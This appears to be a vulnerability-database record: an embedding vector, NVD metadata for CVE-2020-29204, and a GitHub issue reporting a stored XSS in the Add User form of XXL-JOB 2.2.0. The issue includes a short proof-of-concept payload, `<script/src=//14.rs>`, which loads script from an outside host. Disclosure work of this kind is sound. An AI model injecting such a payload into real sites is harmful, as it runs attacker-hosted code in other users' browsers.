0.006397766061127186, -0.008488563820719719, -0.0023618265986442566, 0.0021387345623224974, 0.02799529768526554, -0.0024116074200719595, 0.03560624271631241, -0.012102287262678146, -0.000030364037229446694, 0.004672028589993715, -0.003753847908228636, -0.011578666046261787, -0.019027361646294594, -0.007714194245636463, 0.00869506224989891, 0.0160478837788105, 0.01332652848213911, -0.0028541043866425753, -0.007684694137424231, -0.0026107311714440584, -0.016313381493091583, 0.004790027625858784, -0.020517101511359215, 0.0063719539903104305, 0.009366181679069996, 0.003923471551388502, 0.015103890560567379, -0.002732417779043317, 0.00801656674593687, 0.006644826848059893, -0.007043073885142803, -0.005663958843797445, 0.007603569887578487, -0.003060602815821767, 0.020443351939320564, 0.010501923970878124, -0.012972530908882618, 0.014779392629861832, 0.02390957623720169, 0.011084544472396374, -0.022921333089470863, -0.033629756420850754, -0.006537890061736107, -0.010715797543525696, -0.007116823457181454, 0.01607738435268402, 0.0213725958019495, -0.016519879922270775, 0.016829628497362137, -0.031299274414777756, 0.00928505789488554, -0.0044249678030610085, -0.0033537568524479866, -0.0021110784728080034, 0.018083369359374046, -0.01730162464082241, -0.001657519256696105, 0.0017515497747808695, 0.01516288984566927, -0.0002507481840439141, 0.0070725735276937485, 0.0074155088514089584, 0.00868768710643053, 0.0008748530526645482, 0.017729371786117554, -0.003143570851534605, -0.0035750053357332945, -0.013864899054169655, -0.0032947573345154524, -0.009712805040180683, 0.0037980973720550537, 0.016814878210425377, -0.008503313176333904, -0.004174219910055399, -0.009521055966615677, -0.010391299612820148, -0.02508956752717495, -0.0005959878908470273, 0.020900597795844078, -0.003930846694856882, -0.02528131753206253, 0.0023857951164245605, 0.020782599225640297, 0.0028522606007754803, -0.00009282061364501715, 0.0029444473329931498, -0.012493159621953964, 0.0006093549309298396, 0.022950833663344383, 0.02541406638920307, -0.028187045827507973, -0.00868768710643053, 0.0099561782553792, 0.011600790545344353, -0.0015846916940063238, -0.012345660477876663, -0.0019267047755420208, 0.0021866715978831053, 0.01068629790097475, 0.0025425127241760492, 0.01061992347240448, -0.01973535679280758, 0.0014371926663443446, -0.011836789548397064, -0.016519879922270775, 0.007057823706418276, 0.018098119646310806, -0.02274433523416519, -0.003291069995611906, 0.01997135579586029, 0.0019801731687039137, -0.027361052110791206, 0.00630189199000597, 0.005210399627685547, 0.00987505353987217, -0.0036800983361899853, 0.020251603797078133, -0.006242892239242792, -0.009830803610384464, 0.003119602333754301, 0.009793928824365139, -0.01250790897756815, 0.0035215369425714016, -0.0021903591696172953, -0.0021627030801028013, 0.0057561458088457584, -0.007633069530129433, 0.01260378398001194, 0.0012583502102643251, 0.008776186034083366, -0.005612334236502647, -0.000614425225649029, 0.004015658516436815, 0.0022014216519892216, 0.023157332092523575, 0.012979906052350998, 0.023467080667614937, 0.003864472033455968, 0.005357898771762848, 0.007810068316757679, -0.008385314606130123, -0.0199861042201519, -0.0033021322451531887, -0.009609554894268513, -0.001199350692331791, -0.013341277837753296, -0.004672028589993715, -0.021623343229293823, 0.014292646199464798, -0.01257428340613842, 0.008827811107039452, -0.011954788118600845, -0.00663376459851861, 0.0072237602435052395, 0.01517764013260603, -0.011681915260851383, -0.013628900982439518, -0.0039050341583788395, 0.0050481511279940605, -0.008001817390322685, -0.01718362607061863, 0.012198161333799362, -0.017906369641423225, 0.009661179967224598, -0.018142368644475937, 0.006467828061431646, -0.01977960579097271, 0.013142154552042484, 0.0199861042201519, 0.015457888133823872, 0.0025517314206808805, -0.006442015990614891, -0.005099775735288858, 0.013636276125907898, -0.012382535263895988, -0.019499357789754868, 0.005195649806410074, 0.006430953275412321, 0.01725737564265728, 0.0006595967570319772, -0.013370778411626816, -0.013746900483965874, 0.014757268130779266, 0.025487815961241722, -0.00014023922267369926, -0.005457460414618254, 0.01252265926450491, -0.01125416811555624, 0.01253740955144167, 0.0185258649289608, -0.008282065391540527, -0.006644826848059893, 0.0005231602699495852, 0.006902949884533882, 0.01846686564385891, 0.01126154325902462, -0.018997862935066223, 0.008503313176333904, 0.003335319459438324, 0.005346836056560278, 0.00801656674593687, 0.0038017849437892437, -0.017994869500398636, -0.013510902412235737, -0.03286276012659073, -0.0005899957031942904, 0.0025793875101953745, 0.005815145559608936, -0.039087217301130295, -0.001958048203960061, 0.010066801682114601, -0.008333689533174038, -0.03988371044397354, 0.004889589734375477, 0.012190786190330982, -0.003250507637858391, -0.01199166290462017, -0.005870457272976637, 0.01567913591861725, 0.006265017203986645, 0.005553334951400757, 0.0016750347567722201, 0.007500320672988892, 0.005096088163554668, -0.0033556006383150816, -0.01587088406085968, -0.010391299612820148, 0.005645521450787783, -0.011622915975749493, -0.022095339372754097, 0.008046066388487816, 0.010428174398839474, 0.03188926726579666, -0.008967935107648373, -0.01703612692654133, -0.010199551470577717, -0.008901560679078102, 0.02666780725121498, 0.016800127923488617, -0.003508630907163024, 0.010044677183032036, -0.015384138561785221, 0.0035270683001726866, -0.00800919160246849, 0.0013431621482595801, -0.015148140490055084, 0.021756092086434364, -0.032361265271902084, 0.031269773840904236, 0.00920393317937851, -0.00802394188940525, -0.007574070245027542, 0.02405707538127899, -0.012684907764196396, -0.012176036834716797, -0.005852019879966974, -0.01002255268394947, -0.010044677183032036, -0.005431648343801498, -0.004247969016432762, -0.026166310533881187, -0.0106125483289361, 0.0250158179551363, 0.005734020844101906, -0.018894612789154053, -0.014071398414671421, 0.011062419973313808, -0.016180632635951042, -0.00596264423802495, -0.014956391416490078, 0.041889697313308716, -0.000642081256955862, 0.016977127641439438, -0.02410132624208927, -0.024322573095560074, -0.004358593374490738, -0.014218896627426147, 0.014823642559349537, 0.011622915975749493, -0.011903163976967335, -0.005608646664768457, 0.028172295540571213, -0.015148140490055084, 0.002957353601232171, 0.007452383637428284, 0.019145362079143524, 0.013459277339279652, 0.0034090690314769745, 0.023172082379460335, 0.009793928824365139, -0.011504916474223137, 0.010236426256597042, 0.014373770914971828, 0.020133603364229202, -0.01067892275750637, -0.012367784976959229, 0.0021332032047212124, -0.016711628064513206, -0.04218469560146332, -0.021652843803167343, 0.0020576100796461105, -0.029352286830544472, -0.0003904112381860614, -0.016844378784298897, 0.003834972158074379, -0.009049059823155403, -0.00023622876324225217, -0.000606589368544519, -0.007640444673597813, 0.007773193530738354, 0.003674567211419344, 0.008348439820110798, -0.0017100657569244504, -0.00662638945505023, -0.014919516630470753, 0.008960559964179993, -0.01260378398001194, 0.0010675234952941537, -0.01532513927668333, -0.0043844059109687805, -0.0009651961154304445, -0.01607738435268402, -0.0036137239076197147, 0.007334384135901928, 0.004498717375099659, 0.007234822493046522, -0.008289439603686333, -0.010973920114338398, -0.008591813035309315, -0.0037944100331515074, 0.011608165688812733, 0.014204147271811962, -0.0017561591230332851, -0.0033574444241821766, -0.006873450241982937, 0.014211522415280342, -0.0015137078007683158, -0.0003055993583984673, 0.017950620502233505, 0.011954788118600845, -0.053601112216711044, 0.002240139991044998, -0.020797349512577057, 0.02104809693992138, 0.0047089033760130405, 0.012566909193992615, -0.0021461094729602337, -0.004624091554433107, -0.006766513455659151, -0.020546600222587585, 0.005815145559608936, -0.007393383886665106, 0.018865114077925682, -0.013695275411009789, -0.01879136450588703, 0.004605654161423445, 0.01985335536301136, -0.005623396951705217, 0.02762654982507229, 0.00789856817573309, -0.00862131267786026, -0.000211914477404207, 0.00397140858694911, 0.00018806113803293556, 0.001434427103959024, 0.01709512621164322, -0.012743907980620861, -0.006191267631947994, 0.02267058566212654, 0.012566909193992615, -0.008525438606739044, -0.0023267955984920263, -0.015546387061476707, -0.0106125483289361, 0.013599401339888573, -0.013149529695510864, 0.0062244548462331295, 0.005457460414618254, 0.017729371786117554, 0.007043073885142803, -0.0031269772443920374, 0.0012343816924840212, 0.001465770648792386, -0.006338766776025295, 0.004222156945616007, -0.005022338591516018, -0.00281722960062325, -0.012323535978794098, -0.0013920211931690574, -0.008451689034700394, -0.003036634298041463, 0.008333689533174038, 0.001019586343318224, -0.00994880311191082, -0.0034975684247910976, -0.009978302754461765, 0.04501667246222496, -0.0031159149948507547, -0.023334329947829247, -0.01529563870280981, -0.007419196423143148, -0.0015127859078347683, 0.017788371071219444, -0.018924113363027573, 0.007846943102777004, -0.015649637207388878, 0.008879435248672962, 0.02121034637093544, 0.0032818512991070747, -0.02000085450708866, -0.010450298897922039, -0.003005290636792779, -0.01868811435997486, 0.00199123565107584, 0.00629451684653759, -0.016859127208590508, -0.0025222317781299353, -0.005173524841666222, 0.017493372783064842, -0.0028504168149083853, -0.0023673579562455416, -0.0032191642094403505, 0.011268918402493, 0.02921953797340393, -0.008761436678469181, 0.00862868782132864, 0.008761436678469181, -0.009705429896712303, 0.01725737564265728, 0.0017395655158907175, -0.015207139775156975, -0.0047568404115736485, 0.007057823706418276, -0.012249786406755447, -0.006777575705200434, 0.010627297684550285, 0.011836789548397064, 0.003724348032847047, 0.007684694137424231, 0.00789119303226471, -0.0010380237363278866, -0.0062207672744989395, 0.010214300826191902, -0.000012027500815747771, 0.013378152623772621, 0.007802693638950586, -0.02892453968524933, 0.024765070527791977, 0.00045148501521907747, 0.01391652412712574, 0.002203265205025673, -0.007758443709462881, -0.0018409710610285401, 0.00020868793944828212, -0.0037907224614173174, -0.021652843803167343, 0.00869506224989891, 0.002100015990436077, -0.012493159621953964, 0.01250790897756815, 0.014366395771503448, -0.011888413690030575, -0.012249786406755447, 0.006877137813717127, 0.013680526055395603, 0.02389482595026493, 0.0062207672744989395, -0.012766032479703426, 0.02652030810713768, -0.0044249678030610085, -0.003648754907771945, -0.0007872755522839725, -0.004793715197592974, -0.013208528980612755, -0.01578238606452942, 0.0024890445638448, 0.006117518059909344, 0.006239204667508602, 0.0006600577034987509, -0.013459277339279652, -0.002509325509890914, 0.006379328668117523, 0.007057823706418276, -0.01566438563168049, 0.005166150163859129, 0.006065893452614546, -0.002072359900921583, 0.014211522415280342, -0.024145575240254402, 0.025886062532663345, 0.010774796828627586, 0.0012187098618596792, 0.006456765811890364, -0.005922081880271435, -0.01973535679280758, -0.018850363790988922, -0.008141941390931606, 0.01118041854351759, 0.01744912378489971, 0.002715824171900749, -0.03168277069926262, 0.008990059606730938, 0.006349829025566578, 0.03758272901177406, -0.004406530410051346, 0.008377939462661743, 0.009144933894276619, 0.008894185535609722, -0.00396772101521492, -0.007256947457790375, -0.005815145559608936, 0.010096302255988121, 0.018879862502217293, -0.011667164973914623, -0.004284843802452087, -0.01118041854351759, 0.009233432821929455, 0.0012518971925601363, -0.006442015990614891, 0.039116717875003815, -0.023098332807421684, -0.03463274985551834, -0.011586041189730167, -0.019617358222603798, 0.00006430031498894095, 0.018909363076090813, 0.012721782550215721, -0.022906584665179253, -0.007105761207640171, 0.012751282192766666, -0.002726886421442032, 0.013009405694901943, 0.0035491930320858955, -0.00563814677298069, -0.028260795399546623, 0.004358593374490738, 0.009425181895494461, 0.003403537906706333, -0.002839354332536459, 0.00028462684713304043, 0.011416417546570301, 0.005332086235284805, -0.013459277339279652, 0.008761436678469181, 0.015398888848721981, 0.0033740380313247442, 0.005206712055951357, 0.01333390362560749, 0.016239631921052933, -0.016770629212260246, 0.0039124093018472195, 0.004808465018868446, 0.0026568244211375713, -0.011416417546570301, 0.006246579810976982, 0.004369655624032021, 0.010627297684550285, 0.014137772843241692, 0.0003752004122361541, -0.013127405196428299, 0.001517395256087184, -0.025576313957571983, 0.001025117584504187, 0.018924113363027573, 0.017817871645092964, 0.01743437349796295, 0.005439023021608591, -0.02629905939102173, -0.008127191103994846, -0.0027692923322319984, -0.014705643057823181, -0.01610688306391239, 0.0011412729509174824, 0.0009993052808567882, -0.004358593374490738, -0.017906369641423225, 0.002129515865817666, -0.006508390419185162, 0.026948055252432823, 0.004601966589689255, -0.020472852513194084, 0.005734020844101906, 0.008650812320411205, -0.004321718588471413, -0.003993533551692963, 0.011659790761768818, 0.009631680324673653, -0.005011276341974735, 0.0060843308456242085, -0.013378152623772621, -0.017640871927142143, 0.014454895630478859, 0.01712462678551674, -0.01699187606573105, 0.02001560479402542, -0.023437580093741417, -0.015096515417098999, -0.0029149476904422045, 0.0006983152707107365, -0.010465049184858799, -0.01134266797453165, -0.023511329665780067, -0.02115134708583355, -0.0004595513455569744, 0.01587088406085968, -0.020177854225039482, 0.007260635029524565, -0.025679564103484154, 0.00662638945505023, 0.01002255268394947, -0.010280675254762173, 0.017714621499180794, 0.0021202971693128347, -0.010959170758724213, -0.00629820441827178, 0.004067283123731613, -0.012552158907055855, 0.0031527895480394363, -0.0060806432738900185, 0.0005932222702540457, 0.020472852513194084, 0.017611373215913773, 0.03147627040743828, -0.009852929040789604, -0.028673792257905006, -0.012913531623780727, -0.014204147271811962, -0.030148781836032867, 0.0017626122571527958, 0.002760073635727167, 0.010457674041390419, 0.0050481511279940605, 0.004085720516741276, 0.015457888133823872, 0.00994880311191082, 0.02008935436606407, 0.012220286764204502, -0.014344271272420883, 0.01184416376054287, -0.020826848223805428, 0.016608379781246185, -0.006545265205204487, 0.0006374719669111073, 0.036579735577106476, 0.023452330380678177, -0.014941642060875893, -0.007669944316148758, -0.002865166636183858, 0.020561350509524345, 0.004163157194852829, -0.0001634011568967253, -0.005402148235589266, -0.011423791758716106, -0.0145876444876194, 0.010752672329545021, -0.00802394188940525, -0.010442924685776234, -0.00042037194361910224, -0.009816054254770279, -0.002409763867035508, -0.0035418181214481592, 0.0055607096292078495, -0.017921119928359985, -0.0012537408620119095, 0.0014574738452211022, -0.04250919073820114, 0.01570863649249077, 0.0008550328784622252, 0.01397552341222763, -0.01607738435268402, -0.01463189348578453, 0.029957033693790436, 0.010723172686994076, 0.019396109506487846, -0.009830803610384464, 0.0014565519522875547, -0.0185258649289608, 0.007518758065998554, -0.003147258423268795, -0.01390914898365736, -0.012773407623171806, 0.00994142796844244, 0.013828025199472904, 0.0077436938881874084, 0.007146323099732399, -0.02255258709192276, -0.001050929888151586, -0.02893928997218609, 0.006058518774807453, -0.006213392596691847, -0.014388520270586014, -0.014418020844459534, -0.010752672329545021, 0.0037796602118760347, 0.0006116596050560474, -0.026151560246944427, 0.018157118931412697, 0.0005526600289158523, -0.013142154552042484, 0.0013754275860264897, -0.00661901431158185, -0.006641139276325703, 0.00530996173620224, -0.0016095821047201753, 0.0005498944665305316, -0.016564130783081055, -0.009174433536827564, -0.0018299085786566138, 0.002761917421594262, 0.0015441294526681304, -0.03454424813389778, -0.008392688818275928, -0.0020594538655132055, -0.011615540832281113, -0.0005217774887569249, -0.010029926896095276, 0.002918635029345751, 0.013208528980612755, -0.026800556108355522, 0.005457460414618254, 0.013828025199472904, -0.004690465983003378, -0.025812312960624695, 0.01067154761403799, 0.017567122355103493, 0.012471034191548824, -0.011586041189730167, 0.004023033194243908, -0.017773620784282684, 0.004365968517959118, 0.014078772626817226, -0.0004708442429546267, 0.0223903376609087, -0.009808679111301899, -0.006508390419185162, 0.028098545968532562, 0.006655889097601175, 0.014152522198855877, 0.013761649839580059, 0.0012233192101120949, -0.001546895015053451, -0.006272391881793737, 0.017817871645092964, 0.00007196334627224132, 0.004218469373881817, 0.011084544472396374, 0.005988456774502993, 0.0034441000316292048, 0.012404659762978554, -0.0070836362428963184, 0.002123984508216381, -0.01326752919703722, 0.004247969016432762, -0.007987067103385925, 0.014034523628652096, 0.012987281195819378, -0.009373556822538376, -0.003587911603972316, 0.0223903376609087, -0.004417593125253916, 0.009720179252326488, 0.0006167298997752368, 0.010221675969660282, -0.02126934565603733, 0.019381359219551086, -0.012825031764805317, -0.03044378012418747, 0.005656584165990353, -0.009071184322237968, -0.0055607096292078495, -0.014779392629861832, 0.0030808839946985245, -0.01463189348578453, -0.0034920373000204563, -0.018083369359374046, 0.022080589085817337, 0.021579094231128693, 0.028865540400147438, -0.008857310749590397, -0.01743437349796295, -0.004085720516741276, 0.010369175113737583, 0.004524529911577702, -0.012633283622562885, 0.008046066388487816, -0.007268009707331657, -0.023363830521702766, -0.003032946726307273, 0.0064125158824026585, -0.018835613504052162, -0.0011191481025889516, 0.0020059854723513126, -0.005398460663855076, -0.03159427270293236, 0.000059345271438360214, 0.014071398414671421, 0.03218426555395126, 0.0037796602118760347, 0.005317336414009333, 0.016195382922887802, -0.012028537690639496, 0.0036598171573132277, -0.016269132494926453, 0.01457289420068264, -0.015457888133823872, 0.00030075953691266477, -0.018157118931412697, 0.004624091554433107, 0.001266647013835609, 0.006014268845319748, 0.005391085986047983, -0.010398674756288528, 0.012714407406747341, 0.005855707451701164, 0.007323321886360645, 0.002592293778434396, -0.001546895015053451, -0.013805899769067764, 0.015280889347195625, -0.011077169328927994, 0.004487655125558376, 0.005498022772371769, 0.008134566247463226, 0.004524529911577702, -0.01705087721347809, -0.003960346337407827, 0.006512077990919352, -0.00497440155595541, 0.0210775975137949, -0.017213124781847, -0.017685120925307274, -0.010841171257197857, 0.006213392596691847, -0.0277150496840477, 0.0060843308456242085, 0.008813060820102692, -0.003453318728134036, -0.018909363076090813, 0.00729013467207551, 0.015354638919234276, 0.007205322850495577, -0.020546600222587585, -0.03183026984333992, 0.0047052158042788506, -0.00793544203042984, 0.00854756310582161, -0.0021368907764554024, 0.028555793687701225, -0.013621525838971138, -0.012684907764196396, 0.010649423114955425, -0.004369655624032021, 0.003645067336037755, -0.008813060820102692, 0.005885207559913397, 0.02135784551501274, 0.014027148485183716, 0.00794281717389822, -0.0076994444243609905, 0.016785377636551857, 0.011173044331371784, 0.0025535752065479755, -0.015133390203118324, -0.01264803297817707, 0.012434160336852074, -0.004989151377230883, 0.0010813515400514007, -0.0038054725155234337, -0.007201635278761387, -0.00031804456375539303, -0.012382535263895988, 0.0031693833880126476, 0.017522873356938362, -0.003901346819475293, 0.012758657336235046, 0.012161286547780037, 0.011150918900966644, 0.01267015840858221, -0.010317550040781498, -0.017567122355103493, -0.008798311464488506, 0.005763520952314138, 0.02008935436606407, 0.0016197225777432323, 0.026771055534482002, 0.011025545187294483, -0.0005480507388710976, 0.006180205382406712, -0.0014445676933974028, 0.002341545419767499, -0.015487387776374817, 0.006821825634688139, 0.0007794396369718015, 0.016859127208590508, 0.02908678911626339, -0.020325353369116783, -0.008296814747154713, 0.022877084091305733, -0.006928762421011925, 0.023216331377625465, 0.021579094231128693, 0.01265540812164545, -0.01584138534963131, 0.008518063463270664, 0.0037077544257044792, 0.032715264707803726, -0.012220286764204502, -0.017847370356321335, -0.022862333804368973, 0.00165567547082901, -0.0012555846478790045, 0.013370778411626816, -0.0011016326025128365, -0.021992091089487076, -0.010789547115564346, -0.005944206845015287, -0.0067038265988230705, -0.01746387407183647, 0.04504617303609848, -0.0011882882099598646, 0.013488776981830597, -0.0029905408155173063, -0.004074657801538706, 0.00038557141670025885, 0.004078345373272896, -0.002398701384663582, 0.011416417546570301, 0.014949016273021698, -0.003287382423877716, 0.0023507641162723303, -0.0011274449061602354, -0.00010745527833933011, -0.011962163262069225, 0.008355814032256603, -0.0034975684247910976, 0.0038534095510840416, -0.003316882299259305, -0.008768811821937561, -0.03215476870536804, -0.014477020129561424, -0.0020797348115593195, -0.0038423470687121153, -0.0017736746231094003, -0.012957780621945858, -0.01267753355205059, 0.002341545419767499, -0.012611158192157745, -0.012795532122254372, -0.019056862220168114, -0.005689771380275488, 0.009484181180596352, -0.019233860075473785, -0.007662569638341665, -0.011173044331371784, 0.010229051113128662, 0.0009624305530451238, 0.002271483652293682, 0.01132054254412651, -0.015067015774548054, -0.029986532405018806, -0.003060602815821767, 0.008001817390322685, -0.004701528232544661, -0.006681701634079218, -0.00014035444473847747, -0.015354638919234276, 0.005505397450178862, -0.01587088406085968, 0.0038423470687121153, 0.03141727298498154, 0.0005863082478754222, 0.0004146102874074131, 0.009410431608557701, -0.002203265205025673, 0.012190786190330982, 0.016918126493692398, 0.004277469124644995, 0.0012657252373173833, 0.01722787506878376, 0.005144025199115276, 0.01199903804808855, -0.00695457449182868, -0.01002255268394947, -0.0015201608184725046, -0.019587857648730278, -0.006113830488175154, 0.004933839198201895, 0.004679403733462095, -0.009255558252334595, 0.0037059106398373842, 0.008990059606730938, 0.019632108509540558, -0.021918341517448425, 0.006471515633165836, 0.005398460663855076, 0.001450098818168044, -0.023526079952716827, -0.012131786905229092, 0.024411072954535484, -0.00862131267786026, -0.00281354202888906, 0.004506092518568039, 0.013533026911318302, -0.01185891404747963, 0.0021645468659698963, 0.014336896128952503, -0.003455162514001131, -0.010465049184858799, -0.002039172686636448, 0.011563915759325027, -0.01317902933806181, 0.006803388241678476, 0.0070320116356015205, 0.02233133837580681, 0.006932449527084827, -0.006054831203073263, 0.004502404946833849, -0.012434160336852074, 0.009616930037736893, 0.013356028124690056, -0.023245831951498985, 0.002240139991044998, 0.002208796562626958, -0.004118907731026411, -0.00596633180975914, 0.0022493586875498295, -0.0237030778080225, 0.003394319210201502, -0.06189054995775223, 0.003897659247741103, 0.008178816176950932, 0.02364407852292061, 0.027066053822636604, 0.0024484822060912848, 0.012950406409800053, -0.006154392845928669, -0.009233432821929455, 0.007987067103385925, 0.007533507887274027, -0.014971141703426838, 0.0003982471243944019, -0.014226271770894527, -0.004159469623118639, 0.0024540135636925697, 0.018260367214679718, 0.053601112216711044, -0.005863082595169544, 0.020163103938102722, 0.007382321637123823, -0.009712805040180683, 0.004476592410355806, 0.0018511115340515971, -0.012323535978794098, 0.005354211200028658, 0.009307182393968105, -0.012294036336243153, 0.024897819384932518, 0.005719271022826433, -0.026682555675506592, -0.00011880577949341387, 0.006666951812803745, 0.0019359234720468521, 0.0028006359934806824, -0.023054083809256554, -0.010826421901583672, -0.0062908292748034, -0.0025462002959102392, 0.021726593375205994, 0.005011276341974735, 0.004878527019172907, 0.010804296471178532, 0.002734261332079768, -0.021888840943574905, 0.001191053888760507, -0.01988285593688488, 0.019351860508322716, 0.00464252894744277, 0.0009320088429376483, 0.009712805040180683, 0.0319482684135437, -0.0016151133459061384, -0.00994142796844244, 0.020354852080345154, -0.0017082219710573554, -0.014794142916798592, 0.0074155088514089584, 0.014049272984266281, -0.024381572380661964, -0.0010564611293375492, -0.002271483652293682, 0.004771590232849121, -0.020354852080345154, 0.003259726334363222, 0.02653505839407444, 0.017803121358156204, -0.0010205082362517715, 0.023127831518650055, -0.005719271022826433, -0.001477754907682538, 0.012957780621945858, -0.019160110503435135, 0.003964033909142017, -0.004015658516436815, -0.004660966340452433, -0.00010140551603399217, -0.018157118931412697, -0.005442710593342781, -0.00999305211007595, 0.01523663941770792, -0.019056862220168114, 0.008724561892449856, 0.014019773341715336, 0.00663007702678442, -0.025886062532663345, 0.025664813816547394, 0.006353516597300768, -0.0022880772594362497, -0.0034625374246388674, -0.002752698725089431, -0.008230440318584442, -0.0050887130200862885, 0.024617571383714676, 0.010435549542307854, -0.003696691943332553, -0.005195649806410074, -0.02494206838309765, -0.03035528026521206, 0.01267015840858221, 0.004177907016128302, -0.015266139060258865, -0.010804296471178532, 0.003584224032238126, 0.010472424328327179, 0.003993533551692963, 0.00662270188331604, -0.005818832665681839, 0.012124411761760712, -0.01570863649249077, 0.002039172686636448, -0.01390177384018898, -0.007142635527998209, -0.00006988914537942037, 0.009624305181205273, 0.008864685893058777, 0.004181594587862492, -0.01703612692654133, 0.011173044331371784, -0.02777404896914959, -0.008717186748981476, -0.008385314606130123, 0.00347728724591434, -0.011423791758716106, -0.018865114077925682, -0.010413424111902714, 0.00986767839640379, -0.0055570220574736595, 0.025959812104701996, -0.018053868785500526, 0.0032394451554864645, -0.0034699123352766037, -0.00796494260430336, -0.0199123565107584, -0.010450298897922039, -0.0018040962750092149, -0.005656584165990353, -0.014484395273029804, -0.0014012398896738887, 0.020192604511976242, 0.004937526769936085, 0.010376549325883389, -0.019115861505270004, 0.01452127005904913, 0.011143544688820839, -0.008333689533174038, -0.00728275952860713, 0.0008665561908856034, -0.020738350227475166, -0.0016068164259195328, 0.02938178740441799, -0.003257882548496127, 0.02898354083299637, 0.008724561892449856, -0.002271483652293682, 0.011062419973313808, -0.0018252992304041982, -0.016800127923488617, 0.03666823357343674, 0.0017570810159668326, 0.01529563870280981, -0.016844378784298897, 0.0017460186500102282, -0.025827063247561455, -0.009373556822538376, -0.004465530160814524, -0.008805686607956886, 0.010863296687602997, 0.010789547115564346, 0.017611373215913773, -0.0003461615415289998, 0.00728644710034132, 0.006106455810368061, 0.006873450241982937, 0.028880290687084198, -0.021741341799497604, 0.00869506224989891, 0.0021700779907405376, -0.0033500695135444403, -0.01067892275750637, 0.012780782766640186, -0.006265017203986645, 0.0009292432805523276, -0.005018651019781828, -0.003316882299259305, 0.02507481910288334, -0.0037372540682554245, -0.0022143276873975992, 0.004262719303369522, -0.025620564818382263, -0.017906369641423225, 0.01132791768759489, 0.01000042725354433, -0.00140677101444453, -0.0043844059109687805, 0.002455857116729021, 0.018260367214679718, -0.0004973479663021863, 0.018260367214679718, -0.014145147055387497, -0.0008863763650879264, -0.011305793188512325, 0.010951795615255833, -0.010428174398839474, -0.011313168331980705, 0.015089140273630619, 0.02143159508705139, 0.008407439105212688, -0.02097434736788273, 0.014941642060875893, 0.002050235169008374, -0.009639055468142033, 0.01184416376054287, -0.013510902412235737, 0.002560950117185712, 0.019543608650565147, -0.025694314390420914, -0.018201367929577827, -0.015037516131997108, -0.01118041854351759, 0.03301025927066803 ]
1,779
CVE-2020-29204
2020-12-27T06:15:12.387000
XXL-JOB 2.2.0 allows Stored XSS (in Add User) to bypass the 20-character limit via xxl-job-admin/src/main/java/com/xxl/job/admin/controller/UserController.java.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/2083" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C7AE69F1-6781-47B8-933D-989F4EF5ED19", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/xuxueli/xxl-job/issues/2083
[ "Exploit", "Third Party Advisory" ]
github.com
[ "xuxueli", "xxl-job" ]
Please answer some questions before submitting your issue. Thanks! ### Which version of XXL-JOB do you using? v2.2.0 ### Expected behavior Add User。 ### Actual behavior Add User Stored XSS vulnerabilities . Escape 20 length limit ### Steps to reproduce the behavior url:https://github.com/xuxueli/xxl-job/blob/master/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/UserController.java ![image](https://user-images.githubusercontent.com/13534268/99511776-a9427b00-29c3-11eb-8c9a-8e8fd242a002.png) poc: <script/src=//14.rs> ![image](https://user-images.githubusercontent.com/13534268/99512016-f6bee800-29c3-11eb-8ec1-295659b483ea.png) The page automatically loads and triggers XSS ![image](https://user-images.githubusercontent.com/13534268/99512459-6e8d1280-29c4-11eb-9fcb-4873300377a5.png) ![image](https://user-images.githubusercontent.com/13534268/99512814-df342f00-29c4-11eb-9a27-2f982e1f7d3f.png) ### Other information Restoration suggestions:
v2.2.0 Add User Stored XSS vulnerabilities . Escape 20 length limit
https://api.github.com/repos/xuxueli/xxl-job/issues/2083/comments
1
2020-11-18T09:38:37
2022-10-07T09:30:37Z
https://github.com/xuxueli/xxl-job/issues/2083
745,495,627
2,083
true
This is a GitHub Issue repo:xxl-job owner:xuxueli Title : v2.2.0 Add User Stored XSS vulnerabilities . Escape 20 length limit Issue date: --- start body --- Please answer some questions before submitting your issue. Thanks! ### Which version of XXL-JOB do you using? v2.2.0 ### Expected behavior Add User。 ### Actual behavior Add User Stored XSS vulnerabilities . Escape 20 length limit ### Steps to reproduce the behavior url:https://github.com/xuxueli/xxl-job/blob/master/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/UserController.java ![image](https://user-images.githubusercontent.com/13534268/99511776-a9427b00-29c3-11eb-8c9a-8e8fd242a002.png) poc: <script/src=//14.rs> ![image](https://user-images.githubusercontent.com/13534268/99512016-f6bee800-29c3-11eb-8ec1-295659b483ea.png) The page automatically loads and triggers XSS ![image](https://user-images.githubusercontent.com/13534268/99512459-6e8d1280-29c4-11eb-9fcb-4873300377a5.png) ![image](https://user-images.githubusercontent.com/13534268/99512814-df342f00-29c4-11eb-9a27-2f982e1f7d3f.png) ### Other information Restoration suggestions: --- end body ---
1,157
